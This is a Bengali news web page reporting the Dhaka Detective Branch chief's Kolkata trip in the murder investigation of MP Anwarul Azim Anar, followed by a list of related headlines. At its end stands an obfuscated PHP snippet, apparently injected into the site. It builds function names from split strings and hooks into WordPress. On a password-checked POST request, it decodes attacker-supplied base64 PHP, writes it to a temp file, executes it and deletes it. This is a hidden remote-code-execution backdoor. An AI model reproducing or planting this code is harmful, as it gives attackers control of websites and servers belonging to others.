শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ঢাকা ও কলকাতায় গ্রেফতার ঘাতকদের বক্তব্য মিলে গেছে : ডিবিপ্রধান

news-image

নিজস্ব প্রতিবেদক : সংসদ সদস্য আনোয়ারুল আজিম আনার হত্যা মামলার কুলকিনারা করতে যৌথভাবে কাজ করছেন বাংলাদেশ ও ভারতের গোয়েন্দারা। তদন্তের কাজ এরই মধ্যে অনেকটা এগিয়েছে। হত্যার মোটিভ জানা না গেলেও শনাক্ত করা গেছে মূল পরিকল্পনাকারীকে।

আনার হত্যা মামলার তদন্তে কলকাতা গিয়েছিলেন ঢাকা মেট্রোপলিটন পুলিশের (ডিএমপি) গোয়েন্দাপ্রধান মোহাম্মদ হারুন অর রশীদ। সেখানে তিনি হত্যার ঘটনাস্থল সঞ্জিবা গার্ডেনসহ ঘটনার সাথে সম্পৃক্ত বিভিন্ন এলাকা সরেজমিনে পরিদর্শন করেন।

বৃহস্পতিবার (৩০ মে) ঢাকায় ফেরার আগে কলকাতার সাংবাদিকদের সঙ্গে কথা বলেন ডিবিপ্রধান। তিনি বলেন, শতভাগ সফলতা নিয়েই দেশে ফিরছে ডিবির প্রতিনিধি দল।

হারুন অর রশীদ জানান, ঢাকায় গ্রেফতার মূল ঘাতকের কাছ থেকে পাওয়া তথ্য কলকাতায় গ্রেফতার জিহাদের সঙ্গে মিলিয়ে নেওয়ার চেষ্টা করেছেন তারা। দুই ঘাতকের কথায় শতভাগ মিল পাওয়া গেছে।

ডিবিপ্রধান আরও বলেন, কলকাতার ডিজিটাল এভিডেন্সগুলো স্বচক্ষে মিলিয়ে দেখেছেন তারা। এমপি যার বাসায় ছিলেন, সেই গোপাল বাবুর সঙ্গেও কথা বলেছেন।

তিনি জানান, সিআইডিকে সেপটিক ট্যাংক ও কমোড ভেঙে দেখতে অনুরোধ জানিয়েছিলেন তারা। সেপটিক ট্যাংক থেকে ভিকটিমের দেহের অনেক খণ্ডাংশ পাওয়া গেছে।

হারুন অর রশীদ বলেন, ‘আমরা যে যে উদ্দেশ্য নিয়ে কলকাতায় এসেছিলাম, তার শতভাগ সফলতা নিয়ে আমরা বাংলাদেশে ফিরছি। আরও ভালো খবর আপনারা পাবেন’।

আনার হত্যার অন্যতম দুই আসামি ফয়জুল ওরফে সিয়াম ও আখতারুজ্জামান শাহীন পলাতক রয়েছেন। সিয়াম নেপালে ও শাহীন পালিয়েছেন যুক্তরাষ্ট্রে। তাদের ধরতে নেপাল ও ভারত সরকারের কাছে সাহায্য চাওয়া হয়েছে।

চারদিনের কলকাতা সফরে তদন্তে অগ্রগতি নিয়ে হারুন অর রশীদ জানান, এখন পর্যন্ত মাংসের টুকরো উদ্ধার করা হয়েছে। ফরেনসিক পরীক্ষার জন্য তা ল্যাবরেটরিতে পাঠানো হয়েছে।

ডিএনএ টেস্ট করার পর জানা যাবে মাংসের টুকরো আনারের দেহের কিনা। যদি এটি আনারের হয় তাহলে এই মামলায় আরও কিছু তথ্য সামনে উঠে আসতে পারে।

গত ২৬ মে ডিবিপ্রধান মোহাম্মদ হারুন অর রশীদের নেতৃত্বে তিন সদস্যের একটি দল কলকাতায় যায়। পরদিন ২৭ মে সকালে মামলার অন্যতম আসামি কসাই জিহাদকে সঙ্গে নিয়ে সঞ্জিবা গার্ডেনের আলোচিত সেই ফ্ল্যাটে যায় ডিবির ওই দল।

এছাড়াও জিহাদকে নিয়ে বাগজোলা খালের বিভিন্ন স্থান পরিদর্শন করেন তারা। পশ্চিমবঙ্গ সিআইডির হেডকোয়ার্টার অবনীভবনে ভারতীয় গোয়েন্দাদের সাথেও একাধিকবার বৈঠক করেন ডিবি প্রতিনিধিরা।

ঢাকায় রওনা দেওয়ার আগে ডিবিপ্রধান সাংবাদিকদের আরও বলেন, কোলকাতার সিআইডি আধিকারিকরা মামলা তদন্তে যেভাবে সহায়তা করেছেন, তাতে আগামীতে বাংলাদেশের কোন আসামি ভারতের মাটিতে এই ধরনের অপকর্ম করার সাহস পাবে না।

এখন পর্যন্ত সংসদ সদস্য আনার হত্যার ঘটনায় তিন আসামিকে গ্রেপ্তার করে ডিবি পুলিশ। গ্রেপ্তার আসামিরা হলেন- আমানুল্লাহ ওরফে শিমুল ভূঁইয়া, শিলাস্তি রহমান ও ফয়সাল আলী ওরফে সাজি।

উল্লেখ্য, গত ১২ মে চিকিৎসার জন্য ঝিনাইদহের কালীগঞ্জ থেকে চুয়াডাঙ্গার দর্শনার গেদে সীমান্ত দিয়ে ভারতে যান এমপি আনার।

তিনি পশ্চিমবঙ্গে বরাহনগর থানার মণ্ডলপাড়া লেনে গোপাল বিশ্বাস নামে এক বন্ধুর বাড়িতে ওঠেন। সেখানে ১৩ মে তাকে হত্যা করে মরদেহ টুকরো টুকরো করে গুম করা হয়েছে বলে জানায় ডিবি।

আনোয়ারুল আজিম আনার ১৯৬৮ সালের ৩ জানুয়ারি জন্মগ্রহণ করেন। তার পৈতৃক বাড়ি ঝিনাইদহের কালীগঞ্জ উপজেলার মধুগঞ্জ বাজার এলাকায়।

পেশায় ব্যবসায়ী আনোয়ারুল আজিম আনার আওয়ামী লীগের কালিগঞ্জ উপজেলা শাখার সাধারণ সম্পাদক ছিলেন। ঝিনাইদহ-৪ আসন থেকে ২০১৪, ২০১৮ এবং ২০২৪ সালে পরপর তিনবার সংসদ সদস্য হন আনার।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}